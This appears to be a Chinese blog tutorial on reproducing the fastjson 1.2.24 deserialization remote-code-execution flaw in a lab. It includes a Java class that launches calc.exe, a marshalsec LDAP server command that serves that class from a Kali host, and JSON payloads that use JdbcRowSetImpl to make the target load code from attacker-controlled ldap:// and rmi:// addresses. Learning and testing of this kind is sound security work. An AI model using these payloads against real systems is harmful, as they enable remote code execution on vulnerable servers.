35_fastjson

已于 2024-10-18 17:40:51 修改
阅读量161 收藏
点赞数
分类专栏: 渗透测试总结 文章标签: java json 开发语言
于 2022-12-23 22:34:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45301512/article/details/128412967
版权

fastjson

一、简述

fastjson
alibaba 旗下的开源库

快速将不同类型的变量以json格式输出

这里利用fastjson_test2 来调试理解原理,在idea里面打开
在这里插入图片描述

1. fastjson可以将对象转换为json字符串
User user1 = new User("小李",10);
String JsStr1= JSONObject.toJSONString(user1);
System.out.println(JsStr1);

在这里插入图片描述

2. fastjson同样可以将字符串反序列化为对象

@type 决定将要反序列化生成的对象的类

String str = "{\"@type\":\"com.bihuo.User\",\"age\":1000,\"name\":\"老李\"}";
Object obj1 = JSONObject.parse(str);
System.out.println(obj1);

fastjson 在反序列化时 会自动调用属性的set 方法
在这里插入图片描述
setname方法这里存放我们的java命令执行的代码,弹出计算器
在这里插入图片描述
运行完结果,弹出了计算器
在这里插入图片描述

二、1.2.24-rce环境搭建

在这里插入图片描述
在这里插入图片描述

三、fastjson_rec_exploit-master工具利用

这里使用fastjson_rec_exploit-master工具,具体利用百度去查一下
在这里插入图片描述

四、JNDI注入原理

JNDI(Java Naming and Directory Interface,Java命名和目录接口
封装很多功能和函数

主要依靠ldap和rmi

ldap ===> light directory access protocol 轻量级目录访问协议
rmi ===> remote method invoke 远程方法调用

JNDI注入利用流程如下:

1、目标代码中调用了InitialContext.lookup(URI),且URI为用户可控;
2、攻击者控制URI参数为恶意的ldap服务地址,如:ldap://hacker_ldap_server//name;
3、攻击者ldap服务器向目标返回一个Reference对象,Reference对象中指定某个精心构造的Factory类;
4、目标在进行lookup()操作时,会动态加载并实例化Factory类,接着调用factory.getObjectInstance()获取外部远程对象实例;
5、攻击者可以在Factory类文件的构造方法、静态代码块、getObjectInstance()方法等处写入恶意代码,达到RCE的效果;

lookup 通过使用该方法 可以实现远程.class文件的包含
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

五、手动利用

1. 流程

fastjson 相关漏洞 基本都是利用反序列化会自动触发特定类下的成员属性的set方法

idea不能直接获取class文件,java规定的
通过本地的8888端口开启的ldap服务器,来间接访问kali上8789端口存放的class文件,class文件内容是我们写的弹出计算器,通过写好的java文件编译成class文件,最后在idea反序列化运行代码的时候触发
在这里插入图片描述

2. class文件
import java.lang.Runtime;

public class Hello{
    public Hello(){
        try{
            Runtime.getRuntime().exec("cmd.exe /c calc.exe");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Hello e = new Hello();
    }
}
3. 生成class文件

在这里插入图片描述
在这里插入图片描述

4. 复制到kali中进行映射

在这里插入图片描述
可以在windows通过地址访问打开class文件
可以将kali当作一个存放class文件的远程服务器
在这里插入图片描述

5. 利用marshalsec工具开启ldap服务
C:\tools\jdk-1.8.0_144\JDK8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  "http://192.168.11.131:8789/#Hello" 8888

windows通过访问本地的8888端口,可以访问到kali的8789端口下的class文件
在这里插入图片描述

6. 反序列化
ldap:
String str = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://192.168.11.143:8888/Hello\", \"autoCommit\":true}";
Object obj1 = JSONObject.parse(str);

rmi:
String str = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://192.168.11.143:8888/Hello\", \"autoCommit\":true}";
Object obj1 = JSONObject.parse(str);

反序列化生成一个com.sun.rowset包下的JdbcRowSetImpl
通过控制datasourcename的成员属性
最终调用setautoCommit方法
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

反序列化漏洞例子——fastjson反序列化漏洞的调试与分析
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-28 5512
一直知道反序列化漏洞的大概原理和利用方式,但从来没有真正动手调试过,拿来主义终究不可取,于是就有了这篇文章,这里就以fastjson为例,为自己好好捋一捋,沉淀一下。 fastjson介绍 首先创建一个简单Student类: package fastjson; public class Student { private String name; private int age; public Student() { System.out.println("Stu
fastjson2-2.0.11与fastjson-2.0.11同时引入使用toString报错
最新发布
m0_68292446的博客
07-04 416
经过排查发现同时引入此版本的包才会出现这个问题,提高版本可以解决,只引入fastjson2或者fastjson也可以解决,从代码看是下面这行出现的类初始化问题,现在还不知道为什么会这样,有知道的或者研究的大佬可以给说一下撒。使用fastjsonfastjson2同时引入,在代码中使用toString的时候,报错如下。
全网优秀的攻防渗透工具总结!
wuli1024的博客
01-29 1213
首先恭喜你发现了宝藏。本项目集成了全网优秀的攻防武器项目,包含信息收集工具(自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具…etc…),漏洞利用工具(各大CMS利用工具、中间件利用工具等项目),内网渗透工具、应急响应工具、甲方运维工具、等其他安全资料项目,供攻防双方使用。
java fastjson 的测试
yangzm的专栏
04-03 367
public static String ReadFile(String Path){ BufferedReader reader = null; String laststr = ""; try{ FileInputStream fileInputStream = new FileInputStream(Path)...
深入fastjson源码命令执行调试
2201_75353421的博客
06-28 666
本文给出一份fastjson在调试命令执行时的底层过程展现。
探索FastjsonExploit:一个强大的Java Fastjson安全漏洞利用工具
gitblog_00032的博客
04-25 680
探索FastjsonExploit:一个强大的Java Fastjson安全漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 在网络安全领域,及时发现并修复漏洞至关重要。而对于开发人员来说,有一款能够快速理解和测试这些漏洞的工具,无疑会大大提高工作效率。FastjsonExploit就是这样一款项目,它是由c0ny1开发的,专门针对JavaFastjson库的漏洞检...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
fastjson-1.1.35.jar
08-17
《深入理解Fastjson:阿里巴巴的高效JSON解析库》 Fastjson是阿里巴巴开发的一款高性能的Java JSON库,被誉为当前解析速度最快的JSON库之一。这个库以其轻量级、易用性和高效的解析性能,深受广大Java开发者喜爱。...
springboot2.0整合fastjson以及各种使用实例
03-20
jsonArray.add(new JSONObject().put("name", "王五").put("age", 35)); ``` 4. **实际应用**:在Controller层,我们可以使用FastjsonJava对象转化为JSON响应给前端,或者将请求体中的JSON数据转换为Java对象。...
fastjson 各个 版本 jar
03-25
fastjson-1.1.35.jar ,fastjson-1.1.36.jar ,fastjson-1.1.37.jar ,fastjson-1.1.44.jar ,fastjson-1.2.3.jar,fastjson-1.2.4.jar
fastjson的一个小例子
11-19
String jsonArrayString = "[{\"name\":\"Alice\",\"age\":25},{\"name\":\"Bob\",\"age\":35}]"; List<User> userList = JSON.parseArray(jsonArrayString, User.class); ``` 在Android开发中,FastJson还可以用来...
fastjson漏洞复现
buffedon的博客
08-01 3034
fastjson漏洞复现fastjson漏洞原理简介靶机环境搭建漏洞探测发送一个错的数据包正确的数据包发送漏洞利用docker 搭建靶机编译恶意类启动HTTP服务启动rmi服务发送数据利用fastjson漏洞反弹shell fastjson漏洞原理简介 若lookup函数中的参数攻击者可控,便可以指向攻击者的服务器,即可实现JNDI注入实现任意代码执行。 原理(流程): 攻击者访问目标网站,通过burpsuite抓包,以json的格式添加 JdbcRowSetImpl 恶意类信息,发送给目标机。
网安事件处理
qq_52973916的博客
03-18 1450
1.首先通过分析报警,流量分析,日志来收集所发生事故的信息,判断是什么病毒什么样的事故2.按优先级别给事故分级3.然后抑制攻击范围,阻止受害面扩大,封ip、联系厂商能否下线、关系统4.检查启动项 服务 进程 敏感文件 违规账号 结合everything 看新增加的文件新更改的文件5.放到设备里扫一下有没有后门 修补漏洞 打补丁 增加安全策略6.恢复业务系统7.溯源8.写报告①访问控制:确保只有授权用户可以访问您的系统、应用程序或数据。使用密码策略、访问权限配置、实现双因素认证等技术手段。②系统更新:及时对操
初识Fastjson漏洞(环境搭建及漏洞复现)
蚁景网安学院
06-29 3389
目前网上的资源整理不是针对入门玩家,都需要一定的java漏洞调试基础,本文从一个简单的FastJson 漏洞开始,搭建漏洞环境,分析漏洞成因,使用条件等。从入门者的角度看懂并复现漏洞触发...
2024年最全Alibaba Fastjson 入门详细教程_alibaba(2),2024年最新大厂Golang面试真题精选
2401_84910839的博客
05-14 829
FastJson 特性| fastjson相对其他JSON库的特点是快,从2011年fastjson发布1.1.x版本之后,其性能从未被其他Java实现的JSON库超越。| fastjson在阿里巴巴大规模使用,在数万台服务器上部署,fastjson在业界被广泛接受。在2012年被开源中国评选为最受欢迎的国产开源软件之一。| fastjson有非常多的testcase,在1.2.11版本中,testcase超过3321个。每次发布都会进行回归测试,保证质量稳定。
fastjson 的简单使用,对象与JSON字符串互转
shijialeya
11-18 6436
使用 fastjson 当然先要导入 JAR 包,下面是 maven 依赖的地址 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.73</version> </dependency> 先准备一个 Use 和 Grade 类 User.java pack
[漏洞复现]Fastjson1.2.24反序列化环境搭建+漏洞复现
cj_Hydra's Blog
11-02 1487
前言: Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 特性: 提供服务器端、安卓客户端两种解析工具,性能表现较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,pa
fastjson反序列化漏洞原理及利用
杨航的专栏
07-01 3535
重要漏洞利用poc及版本 我是从github上的参考中直接copy的exp,这个类就是要注入的类 import java.lang.Runtime; import java.lang.Process; public class Exploit { public Exploit() { try{ // 要执行的命令 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(commands); pc.waitFor()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值